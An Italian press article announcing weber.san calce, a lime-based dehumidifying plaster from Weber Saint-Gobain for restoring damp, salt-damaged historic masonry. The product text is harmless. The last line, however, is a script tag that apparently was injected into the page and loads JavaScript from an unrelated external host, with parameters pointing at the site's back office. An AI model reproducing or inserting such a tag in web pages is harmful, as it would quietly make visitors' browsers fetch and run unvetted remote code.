Novità in arrivo sul mercato da Weber Saint-Gobain. Si chiama weber.san calce ed è un nuovo intonaco macroporoso a base di calce idraulica naturale, ideale per il risanamento di murature umide soggette a risalita capillare e degrado da efflorescenze saline di qualsiasi natura, e indicato per centri storici, chiese, edifici di interesse storico e ovunque sia richiesto un restauro conservativo, in grado di contrastare e prevenire efficacemente macchie di umido, rigonfiamenti, erosioni e distacchi.
L’innovativo weber.san calce è il risultato dei continui investimenti in ricerca e sviluppo di Weber Saint-Gobain ed è stato oggetto di una lunga progettazione, studi di laboratorio e prove sul campo. Risponde, infatti, a un problema molto sentito nel mercato e nella gestione di lungo periodo degli edifici, poiché la presenza di umidità e di sali all’interno di una muratura ne determina nel tempo un progressivo degrado fisico. Le finiture e gli intonaci che rivestono la muratura, inoltre, si deteriorano, cominciano a staccarsi dal sottofondo e si sfarinano, mentre l’attacco dei sali e soprattutto dei solfati corrode ed intacca anche la muratura sottostante. Weber.san calce è in grado di annullare l’effetto congiunto di umidità e sali che può far perdere alle murature quasi il 50% del loro potere isolante e incidere fortemente sulla dispersione del calore interno, costringendo a consumi energetici elevati e impedendo all’edificio di soddisfare i termini imposti dalla legge.
Weber.san calce arricchisce la già affermata famiglia di prodotti weber.san e affianca lo storico weber.san evoluzione – da oltre trent’anni utilizzato dagli operatori del settore con altissime prestazioni e soddisfazione –, il weber.san termico, l’intonaco deumidificante per l’isolamento termico, infine il weber.san finitura (finitura minerale per intonaci da risanamento) e il weber.san pittura (pittura da risanamento altamente traspirante).
Inoltre, weber.san calce:
• non necessita di trattamento antisale;
• contrasta l’aggressione salina e deumidifica;
• è alleggerito e fibrato;
• è applicabile a mano e macchina;
• è ideale per murature interne ed esterne, anche in alti spessori;
• è compatibile con tutte le finiture minerali alla calce e ai silicati;
• ha un’ottima resa per confezione.
<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2013-10-10&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&cb=0.696842645195959" type="text/javascript"></script>